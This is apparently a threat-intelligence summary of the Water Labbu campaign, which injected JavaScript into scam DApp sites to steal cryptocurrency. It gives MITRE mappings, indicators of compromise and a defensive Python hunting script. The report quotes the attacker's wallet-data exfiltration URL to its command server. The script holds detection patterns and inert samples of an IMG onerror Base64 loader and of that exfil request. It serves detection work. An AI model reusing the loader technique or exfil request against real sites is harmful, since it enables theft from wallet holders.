Water Labbu is a threat actor that parasitically hijacks scam DApp websites by injecting malicious JavaScript to steal cryptocurrency. The campaign uses injected payloads and delivery servers to obtain wallet permissions (token allowances) and drain USDT balances, disguising its activity as that of legitimate DApps.
Keypoints
- Water Labbu parasitically hijacks scam DApp websites by injecting malicious JavaScript to steal cryptocurrency, instead of using direct social engineering.
- The attacker uses an XSS evasion technique (an IMG tag with onerror) to load a Base64-encoded JavaScript payload from a delivery server and tailor content by IP and User-Agent.
- The injected payload requests permissions (token allowances) to transfer assets from victims’ wallets, often disguising the request as coming from the compromised DApp.
- Cookies and LocalStorage data are collected and exfiltrated, with wallet balance and address information sent to an external server before any further action.
- The operation targets fraudulent DApps (about 45 compromised sites) and has drained at least 316,728 USDT from nine victims as of Aug 2022.
- Delivery infrastructure involves multiple servers (tmpmeta.com, whg7.cc, r8s.cc) and deceptive overlays (fake Flash update) to persuade victims to download malicious files like flashupdate_v_3.10.exe.
MITRE Techniques
- [T1189] Drive-by Compromise – Compromise scam DApp websites and inject malicious JavaScript. Quote: “parasitic Water Labbu… compromising the websites of other scammers posing as a decentralized application (DApp) and injected malicious JavaScript code into them.”
- [T1059.007] JavaScript – XSS-based delivery of a Base64-encoded payload loaded via an onerror event. Quote: “an IMG tag to load a Base64-encoded JavaScript payload using the ‘onerror’ event, in what is known as an XSS evasion technique, to bypass Cross Site Scripting (XSS) filters.”
- [T1105] Ingress Tool Transfer – Delivery servers load and serve different payloads from external servers (tmpmeta[.]com) based on environment. Quote: “The delivery server then filters victims and delivers different content based on the IP address and the browser User-Agent header.”
- [T1555.003] Credentials in Web Browsers – Stealer script collects cookies and LocalStorage data from victims. Quote: “stealer script that will collect cookie and LocalStorage data and send them back to the delivery server.”
- [T1071.001] Web Protocols – Exfiltration of wallet data via HTTP to a C2 server (linkstometa[.]com). Quote: “hxxps[:]//linkstometa[.]com/data/?get&s=[%22{ETH balance}%22,%22{USDT balance}%22]&j={Ethereum address}”
- [T1204.002] User Execution – Fake Flash overlay leading to download of a malicious executable (flashupdate_v_3.10.exe). Quote: “fake Flash installation message… downloading the latest version” and the downloaded file is “flashupdate_v_3.10.exe.”
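The two most hunt-friendly traits in the techniques above are the IMG onerror loader (T1059.007) and the wallet-data exfiltration URL shape (T1071.001). The following added example, written for this summary and not taken from the report or from any vendor tooling, shows how a defender can check both: a scanner that flags IMG tags whose onerror handler decodes and executes a Base64 blob, and a proxy-log check that matches the delivery/C2 domains from the IoC list and the `/data/?get&s=[...]&j=<address>` exfil pattern quoted above. The sample HTML, the log lines, the source IPs and the non-IoC hostnames are constructed for the example; the Base64 literal is inert padding, not a real payload.

```python
"""Defensive hunting helpers for the Water Labbu tradecraft described above.

  scan_html()      - flags IMG tags whose onerror handler looks like a
                     Base64 loader (decode + dynamic execution + long blob).
  scan_proxy_log() - flags requests to the report's delivery/C2 domains and
                     requests that match the wallet-data exfil URL shape.
All sample inputs below are constructed for this example.
"""
from __future__ import annotations
import re
from urllib.parse import parse_qs, urlsplit

# Delivery/C2 domains from the report's IoC list.
WATER_LABBU_DOMAINS = {"tmpmeta.com", "linkstometa.com", "whg7.cc", "r8s.cc"}

# An IMG tag carrying an onerror handler; capture the handler body.
IMG_ONERROR_RE = re.compile(
    r"<img\b[^>]*\bonerror\s*=\s*(?P<q>['\"])(?P<handler>.*?)(?P=q)",
    re.IGNORECASE | re.DOTALL,
)
# Traits of a Base64 loader: decoding, dynamic execution, and a long blob.
DECODE_RE = re.compile(r"\batob\s*\(|base64", re.IGNORECASE)
EXEC_RE = re.compile(r"\beval\s*\(|\bFunction\s*\(|\.appendChild\s*\(|\.src\s*=", re.IGNORECASE)
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def scan_html(html: str) -> list[dict]:
    """Return one finding per IMG onerror handler showing at least two loader traits."""
    findings = []
    for m in IMG_ONERROR_RE.finditer(html):
        handler = m.group("handler")
        reasons = []
        if DECODE_RE.search(handler):
            reasons.append("base64-decode")
        if EXEC_RE.search(handler):
            reasons.append("dynamic-execution")
        if B64_BLOB_RE.search(handler):
            reasons.append("long-base64-literal")
        # A single trait (e.g. a fallback image swap) is normal; two or more is not.
        if len(reasons) >= 2:
            findings.append({"handler": handler[:80], "reasons": reasons})
    return findings


# Constructed proxy log format: <timestamp> <client ip> <method> <url>
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)")
ETH_ADDRESS_RE = re.compile(r"0x[0-9a-fA-F]{40}")


def classify_url(url: str) -> list[str]:
    """Tag a URL as a known Water Labbu domain and/or as the wallet exfil shape."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    tags = []
    if host in WATER_LABBU_DOMAINS or any(host.endswith("." + d) for d in WATER_LABBU_DOMAINS):
        tags.append("known-water-labbu-domain")
    # Exfil shape quoted in the report: /data/?get&s=[balances]&j=<Ethereum address>
    if parts.path.rstrip("/").endswith("/data"):
        qs = parse_qs(parts.query, keep_blank_values=True)
        if "get" in qs and "s" in qs and "j" in qs and ETH_ADDRESS_RE.fullmatch(qs["j"][0]):
            tags.append("wallet-exfil-pattern")
    return tags


def scan_proxy_log(text: str) -> list[dict]:
    """Return the log lines whose URL earns at least one tag."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            tags = classify_url(m.group("url"))
            if tags:
                hits.append({"src": m.group("src"), "url": m.group("url"), "tags": tags})
    return hits


# Constructed samples: one benign fallback-image handler and one inert loader-shaped handler.
SAMPLE_HTML = """\
<img src="logo.png" onerror="this.src='fallback.png'">
<img src="x" onerror="eval(atob('QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB'))">
"""

# Constructed log lines; the last entry is a benign /data/ URL that must not match.
SAMPLE_LOG = """\
2022-08-01T10:00:01Z 10.0.0.5 GET https://example-dapp.test/index.html
2022-08-01T10:00:02Z 10.0.0.5 GET https://tmpmeta.com/js/loader.js
2022-08-01T10:00:03Z 10.0.0.5 GET https://linkstometa.com/data/?get&s=[%220.42%22,%2215000%22]&j=0xd6ed30a5ecdeaca58f9abf8a0d76e193e1b7818a
2022-08-01T10:00:04Z 10.0.0.6 GET https://cdn.example.test/data/?get&s=1&j=abc
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print("HTML:", f)
    for h in scan_proxy_log(SAMPLE_LOG):
        print("LOG :", h)
```

The HTML check deliberately requires two traits so that ordinary `onerror` fallbacks (swapping in a placeholder image) are not flagged; the log check separates "talks to a listed domain" from "sends a balance/address tuple to a `/data/` endpoint", because the second pattern is worth alerting on even if the operators move to a domain not yet in the IoC list.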
Indicators of Compromise
- [Domain] Delivery/C2 domains – tmpmeta.com, linkstometa.com, whg7.cc, r8s.cc
- [Ethereum Address] Victim funds and token flows – 0xd6ed30a5ecdeaca58f9abf8a0d76e193e1b7818a, 0x3e9f1d6e244d773360dce4ca88ab3c054f502d51
- [Ethereum Address] Additional drains – 0x486d08f635b90196e5793725176d9f7ead155fed, 0xfc74d6cfdf6da90ae996c999e12002090bc6d5bf
- [Ethereum Address] Newer drain address – 0xfece995f99549011a88bbb8980bbedd8fada5a35
- [Asset] USDT – at least 316,728 USDT drained from nine victims
- [File] flashupdate_v_3.10.exe – downloaded via fake Flash overlay from compromised sites
- [GitHub Repository] flashtech9/Flash – hosting the installer linked to the fake Flash download